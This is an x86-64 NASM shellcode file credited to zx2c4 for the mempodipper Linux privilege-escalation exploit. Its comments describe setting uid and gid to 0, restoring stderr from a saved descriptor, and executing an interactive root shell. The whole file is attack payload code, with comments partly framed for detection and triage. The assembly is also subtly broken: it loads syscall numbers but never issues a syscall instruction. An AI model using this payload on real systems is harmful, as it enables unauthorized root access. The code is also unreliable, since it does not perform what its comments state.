
; This shellcode sets uid and gid to 0 and execs a shell in interactive mode.
; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
; by zx2c4

;-----------------------------------------------------------------------
; Payload body. Intel/NASM syntax; the numbers loaded into al are
; x86-64 Linux syscall numbers (0x69 setuid, 0x6a setgid, 0x21 dup2,
; 0x3b execve).
; Observable sequence for detection/triage: setuid(0) and setgid(0),
; dup2(6, 2) restoring stderr from the saved fd 6 named in the header,
; then execve("//bin/sh", ["//bin/sh", "-i", NULL], NULL), i.e. an
; interactive shell running with uid/gid 0 in the hijacked process.
;-----------------------------------------------------------------------
; setuid(0): rdi (arg 1) = 0, al = 0x69
xor rdi,rdi
mov al,0x69
; setgid(0): rdi (arg 1) = 0, al = 0x6a
xor rdi,rdi
mov al,0x6a
;dup2(6, 2): dil (arg 1) = saved fd 6, sil (arg 2) = stderr, al = 0x21
mov dil,0x6
mov sil,0x2
mov al,0x21

; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
; The path string is built in a register and pushed, so rsp becomes
; the char* for arg 1.
mov qword rbx,'//bin/sh'	; rbx = //bin/sh
shr rbx,0x8			; remove leading / from rbx
push rbx			; push rbx to stack
mov rdi,rsp			; set rdi (arg 1) to top of stack

; "-i" is zero-extended into rbx (upper bytes are the NUL terminator).
xor rbx,rbx
mov bx,'-i'			; rbx = '-i'
push rbx			; push rbx to stack
mov rcx,rsp			; set rcx to top of stack

xor rax,rax			; rax = 0

; so at this point:
;	rdi is a pointer to '/bin/sh'
;	rcx is a pointer to '-i'
;	rax is null
; since they are all the same size, we'll push them on the stack
; and then it will be an array:
; (pushed in reverse so that argv[0] ends up lowest in memory, at rsp)
push rax			; push rax to stack
push rcx			; push rcx to stack
push rdi			; push rdi to stack
mov rsi,rsp			; set rsi (arg 2) to top of stack

xor rdx,rdx			; rdx (arg 3) = 0

mov al,0x3b			; al = 0x3b, which is the exec call